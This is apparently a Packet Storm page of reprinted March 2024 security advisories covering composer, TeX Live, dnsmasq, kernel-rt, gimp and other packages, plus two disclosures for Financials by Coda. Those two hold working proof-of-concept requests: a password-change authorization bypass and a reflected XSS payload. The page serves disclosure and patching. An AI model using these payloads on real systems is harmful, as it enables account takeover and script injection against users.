Debian Linux Security Advisory 5632-1 - It was discovered that composer, a dependency manager for the PHP language, processed files in the local working directory. This could lead to local privilege escalation or malicious code execution. Due to a technical issue this email was not sent on 2024-02-26 like it should have.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5632-1                   security@debian.orghttps://www.debian.org/security/                       Sebastien DelafondFebruary 26, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : composerCVE ID         : CVE-2024-24821Debian Bug     : 1063603It was discovered that composer, a dependency manager for the PHPlanguage, processed files in the local working directory. This couldlead to local privilege escalation or malicious code execution. Due toa technical issue this email was not sent on 2024-02-26 like it shouldhave.For the oldstable distribution (bullseye), this problem has been fixedin version 2.0.9-2+deb11u2.For the stable distribution (bookworm), this problem has been fixed inversion 2.5.5-1+deb12u1.We recommend that you upgrade your composer packages.For the detailed security status of composer please refer toits security tracker page at:https://security-tracker.debian.org/tracker/composerFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCgAdFiEEAqSkbVtrXP4xJMh3EL6Jg/PVnWQFAmX0DyUACgkQEL6Jg/PVnWSBoggAmRdaBN8p7agJH0S2fvEJWuF+gFAAY4112EeOzbHwk/Bm6EuTY9VcGTtjHlW8X3t/H1+NW5xejcm1gEaXIE2HHIc1KTaG3ui/kKC2T3ybx0cmnqYWu/TJWmw+nbaneBK74PkXukzFvjuYaOy7a6EgnpNcMhc0b2tc/IqIUOYiePKbg4lio8u6q5rP5uFIJydeqI0IXja6H4N0ub/zOAn6I6C3ToKMa0WnfllmrMaj/JnBbgam3VrT06n63NoW6xZepdMDP3QofOVWWP5HshF/0CH1BGEcKS6AtAaIgARalFMgbP6SU8NDsgNFQ3UCiuR+sTjZc2YA0muIpmBGSPVyAw===y4my-----END PGP SIGNATURE-----

Debian Security Advisory 5632-1

Financials by Coda versions prior to 2023Q4 suffer from an incorrect access control authorization bypass vulnerability. The Change Password feature can be abused in order to modify the password of any user of the application.

    # Vulnerability type: Incorrect Access Control# Vendor: https://www.unit4.com/# Product: Financials by Coda# Product site: https://www.unit4.com/fr/products/financial-management-software# Affected version: < 2023Q4# Fixed version: 2023Q4# Credit: Léo DRAGHI# CVE: CVE-2024-28735# PROOF OF CONCEPTThe "Change Password" feature can be abused in order to modify the password of any user of the application.The only conditions for an attacker are to have the credentials of a valid account (regardless of the profile) and to know the username of the target.POST /coda/rest/session/password HTTP/2Host: <target><snip>{    "user" : "<targeted_user>",    "password" : "<attacker_user_password>",    "company" : "<company>",    "newPassword" : "<new_password_for_targeted_user",    "tzOffset" :240}# TIMELINE– 30/10/2023: Vulnerability found– 02/11/2023: Vendor informed– 05/12/2023: Vendor fixed the issue– 14/03/2024: Public disclosure

Financials By Coda Authorization Bypass

Financials by Coda versions prior to 2023Q4 suffer from a cross site scripting vulnerability.

    # Vulnerability type: Cross-site Scripting# Vendor: https://www.unit4.com/# Product: Financials by Coda# Product site: https://www.unit4.com/fr/products/financial-management-software# Affected version: < 2023Q4# Fixed version: 2023Q4# Credit: Léo DRAGHI# CVE: CVE-2024-28734# PROOF OF CONCEPTThe /coda/frameset endpoint, accessible by any unauthenticated user, reflects the value of the cols parameter. Since this value is not properly sanitized and encoded when the web page is rendered, this could allow a malicious actor to execute JavaScript code in the context of another user's browser by only sending to a victim a malicious link.GET /coda/frameset?cols="><frame%20src="javascript:alert('XSS')"> HTTP/2Host: <target># TIMELINE– 30/10/2023: Vulnerability found– 02/11/2023: Vendor informed– 05/12/2023: Vendor fixed the issue– 14/03/2024: Public disclosure

Financials By Coda Cross Site Scripting

Ubuntu Security Notice 6695-1 - It was discovered that TeX Live incorrectly handled certain memory operations in the embedded axodraw2 tool. An attacker could possibly use this issue to cause TeX Live to crash, resulting in a denial of service. This issue only affected Ubuntu 20.04 LTS. It was discovered that TeX Live allowed documents to make arbitrary network requests. If a user or automated system were tricked into opening a specially crafted document, a remote attacker could possibly use this issue to exfiltrate sensitive information, or perform other network-related attacks. This issue only affected Ubuntu 20.04 LTS, and Ubuntu 22.04 LTS.

    ==========================================================================Ubuntu Security Notice USN-6695-1March 14, 2024texlive-bin vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.10- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in TeX Live.Software Description:- texlive-bin: Binaries for TeX LiveDetails:It was discovered that TeX Live incorrectly handled certain memoryoperations in the embedded axodraw2 tool. An attacker could possibly usethis issue to cause TeX Live to crash, resulting in a denial of service.This issue only affected Ubuntu 20.04 LTS. (CVE-2019-18604)It was discovered that TeX Live allowed documents to make arbitrarynetwork requests. If a user or automated system were tricked into opening aspecially crafted document, a remote attacker could possibly use this issueto exfiltrate sensitive information, or perform other network-relatedattacks. This issue only affected Ubuntu 20.04 LTS, and Ubuntu 22.04 LTS.(CVE-2023-32668)It was discovered that TeX Live incorrectly handled certain TrueType fonts.If a user or automated system were tricked into opening a specially craftedTrueType font, a remote attacker could use this issue to cause TeX Live tocrash, resulting in a denial of service, or possibly execute arbitrarycode. (CVE-2024-25262)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.10:   texlive-binaries                2023.20230311.66589-6ubuntu0.1   texlive-binaries-sse2           2023.20230311.66589-6ubuntu0.1Ubuntu 22.04 LTS:   texlive-binaries                2021.20210626.59705-1ubuntu0.2Ubuntu 20.04 LTS:   texlive-binaries                2019.20190605.51237-3ubuntu0.2In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6695-1   CVE-2019-18604, CVE-2023-32668, CVE-2024-25262Package Information:   https://launchpad.net/ubuntu/+source/texlive-bin/2023.20230311.66589-6ubuntu0.1   https://launchpad.net/ubuntu/+source/texlive-bin/2021.20210626.59705-1ubuntu0.2   https://launchpad.net/ubuntu/+source/texlive-bin/2019.20190605.51237-3ubuntu0.2

Ubuntu Security Notice USN-6695-1

Red Hat Security Advisory 2024-1335-03 - An update for dnsmasq is now available for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1335.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: dnsmasq security updateAdvisory ID:        RHSA-2024:1335-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1335Issue date:         2024-03-14Revision:           03CVE Names:          CVE-2023-50387====================================================================Summary: An update for dnsmasq is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The dnsmasq packages contain Dnsmasq, a lightweight DNS (Domain Name Server) forwarder and DHCP (Dynamic Host Configuration Protocol) server.Security Fix(es):* dnsmasq: bind9: KeyTrap - Extreme CPU consumption in DNSSEC validator (CVE-2023-50387)* dnsmasq: bind9: Preparing an NSEC3 closest encloser proof can exhaust CPU resources (CVE-2023-50868)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-50387References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263914https://bugzilla.redhat.com/show_bug.cgi?id=2263917

Red Hat Security Advisory 2024-1335-03

Red Hat Security Advisory 2024-1334-03 - An update for dnsmasq is now available for Red Hat Enterprise Linux 9.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1334.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: dnsmasq security updateAdvisory ID:        RHSA-2024:1334-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1334Issue date:         2024-03-14Revision:           03CVE Names:          CVE-2023-50387====================================================================Summary: An update for dnsmasq is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The dnsmasq packages contain Dnsmasq, a lightweight DNS (Domain Name Server) forwarder and DHCP (Dynamic Host Configuration Protocol) server.Security Fix(es):* dnsmasq: bind9: KeyTrap - Extreme CPU consumption in DNSSECvalidator (CVE-2023-50387)* dnsmasq: bind9: Preparing an NSEC3 closest encloser proof canexhaust CPU resources (CVE-2023-50868)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-50387References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263914https://bugzilla.redhat.com/show_bug.cgi?id=2263917

Red Hat Security Advisory 2024-1334-03

Red Hat Security Advisory 2024-1333-03 - Red Hat OpenShift Serverless version 1.32.0 is now available.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1333.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Release of OpenShift Serverless 1.32.0Advisory ID:        RHSA-2024:1333-03Product:            Red Hat OpenShift ServerlessAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1333Issue date:         2024-03-14Revision:           03CVE Names:          CVE-2024-28110====================================================================Summary: Red Hat OpenShift Serverless version 1.32.0 is now available.Red Hat Product Security has rated this update as having a security impact ofModerate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVElink(s) in the References section.Description:Version 1.32.0 of the OpenShift Serverless Operator is supported on Red HatOpenShift Container Platform versions 4.12, 4.13 and 4.14This release includes security, bug fixes, and enhancements.Security Fix(es):* cloudevents/sdk-go: usage of WithRoundTripper to create a Client leaks credentials (CVE-2024-28110)For more details about the security issues, including the impact, a CVSS score, acknowledgements, and other related information, refer to the CVE pages listed in the References section.Solution:https://access.redhat.com/documentation/en-us/red_hat_openshift_serverless/1.32CVEs:CVE-2024-28110References:https://access.redhat.com/security/updates/classification/#moderatehttps://access.redhat.com/documentation/en-us/red_hat_openshift_serverless/1.32https://bugzilla.redhat.com/show_bug.cgi?id=2265972https://bugzilla.redhat.com/show_bug.cgi?id=2265973https://bugzilla.redhat.com/show_bug.cgi?id=2268372

Red Hat Security Advisory 2024-1333-03

Red Hat Security Advisory 2024-1332-03 - An update for kernel-rt is now available for Red Hat Enterprise Linux 7. Issues addressed include a use-after-free vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1332.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: kernel-rt security update  
Advisory ID:        RHSA-2024:1332-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1332  
Issue date:         2024-03-14  
Revision:           03  
CVE Names:          CVE-2022-42896  
====================================================================

Summary: 

An update for kernel-rt is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* sched/membarrier: reduce the ability to hammer on sys_membarrier (CVE-2024-26602)

* use-after-free in l2cap_connect and l2cap_le_connect_req in net/bluetooth/l2cap_core.c (CVE-2022-42896)

* use-after-free in sch_qfq network scheduler (CVE-2023-4921)

* IGB driver inadequate buffer size for frames larger than MTU (CVE-2023-45871)

* fbcon: out-of-sync arrays in fbcon_mode_deleted due to wrong con2fb_map assignment (CVE-2023-38409)

* nf_tables: use-after-free vulnerability in the nft_verdict_init() function (CVE-2024-1086)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2022-42896

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2147364  
https://bugzilla.redhat.com/show_bug.cgi?id=2230042  
https://bugzilla.redhat.com/show_bug.cgi?id=2244723  
https://bugzilla.redhat.com/show_bug.cgi?id=2245514  
https://bugzilla.redhat.com/show_bug.cgi?id=2262126  
https://bugzilla.redhat.com/show_bug.cgi?id=2267695

Red Hat Security Advisory 2024-1332-03

Red Hat Security Advisory 2024-1328-03 - Red Hat Advanced Cluster Management for Kubernetes 2.9.3 General Availability release images, which fix bugs and update container images. Issues addressed include denial of service and traversal vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1328.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: Red Hat Advanced Cluster Management 2.9.3 security and bug fix container updates  
Advisory ID:        RHSA-2024:1328-03  
Product:            Red Hat ACM  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1328  
Issue date:         2024-03-14  
Revision:           03  
CVE Names:          CVE-2023-45142  
====================================================================

Summary: 

Red Hat Advanced Cluster Management for Kubernetes 2.9.3 General  
Availability release images, which fix bugs and update container images.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE links in the References section.

Description:

Red Hat Advanced Cluster Management for Kubernetes 2.9.3 images

Red Hat Advanced Cluster Management for Kubernetes provides the  
capabilities to address common challenges that administrators and site  
reliability engineers face as they work across a range of public and  
private cloud environments. Clusters and applications are all visible and  
managed from a single console—with security policy built in.

This advisory contains the container images for Red Hat Advanced Cluster  
Management for Kubernetes, which fix several bugs. See the following  
Release Notes documentation, which will be updated shortly for this  
release, for additional details about this release:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.9/html/release_notes/

Security fix(es):  
CVE-2023-45142 opentelemetry: DoS vulnerability in otelhttp  
CVE-2023-47108 opentelemetry-go-contrib: DoS vulnerability in otelgrpc due to unbound cardinality metrics  
CVE-2024-25620 helm: Dependency management path traversal  
CVE-2024-26147 helm: Missing YAML Content Leads To Panic

Jira issues addressed: 

* ACM-8728: Machine Pool scaling doesn't work for Openstack cluster  
* ACM-8998: Dependency on ConstraintTemplate stuck in Pending state  
* ACM-9123: Trying to upgrade a managed cluster fails with user forbidden errors  
* ACM-9145: Unable to upgrade managed cluster from ACM  
* ACM-9186: search-postgres persists in CrashLoopBackOff while being included in the ACM CR with hugepages enabled  
* ACM-9311: hcp hypershift operator doesn't support OCP 4.15  
* ACM-9467: [Doc bug] Update adding day2 master to unhealthy cluster procedure doc  
* ACM-9719: log error message when the restore cannot be created  
* ACM-9724: Console Search page flickering on initial loading  
* ACM-9746: Search collector logging excessively  
* ACM-9885: Console initial loading time increases over time [ACM 2.9.z]  
* ACM-9930: A misconfigured PlacementBinding halts root Policy updates  
* ACM-9947: The ACM topology view does not show the correct status when the subscription namespace differs from the resource namespace.

Solution:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.9/html-single/install/index#installing

CVEs:

CVE-2023-45142

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2245180  
https://bugzilla.redhat.com/show_bug.cgi?id=2251198  
https://bugzilla.redhat.com/show_bug.cgi?id=2264336  
https://bugzilla.redhat.com/show_bug.cgi?id=2265440  
https://issues.redhat.com/browse/ACM-8728  
https://issues.redhat.com/browse/ACM-8998  
https://issues.redhat.com/browse/ACM-9123  
https://issues.redhat.com/browse/ACM-9145  
https://issues.redhat.com/browse/ACM-9186  
https://issues.redhat.com/browse/ACM-9311  
https://issues.redhat.com/browse/ACM-9467  
https://issues.redhat.com/browse/ACM-9719  
https://issues.redhat.com/browse/ACM-9724  
https://issues.redhat.com/browse/ACM-9746  
https://issues.redhat.com/browse/ACM-9885  
https://issues.redhat.com/browse/ACM-9930  
https://issues.redhat.com/browse/ACM-9947

Red Hat Security Advisory 2024-1328-03

Red Hat Security Advisory 2024-1327-03 - An update for the gimp:2.8 module is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions. Issues addressed include a buffer overflow vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1327.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: gimp:2.8 security updateAdvisory ID:        RHSA-2024:1327-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1327Issue date:         2024-03-14Revision:           03CVE Names:          CVE-2023-44442====================================================================Summary: An update for the gimp:2.8 module is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The GIMP (GNU Image Manipulation Program) is an image composition and editing program. GIMP provides a large image manipulation toolbox, including channel operations and layers, effects, sub-pixel imaging and anti-aliasing, and conversions, all with multi-level undo.Security Fix(es):* gimp: PSD buffer overflow RCE (CVE-2023-44442)* gimp: psp off-by-one RCE (CVE-2023-44444)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-44442References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2249942https://bugzilla.redhat.com/show_bug.cgi?id=2249946

Source

Packet Storm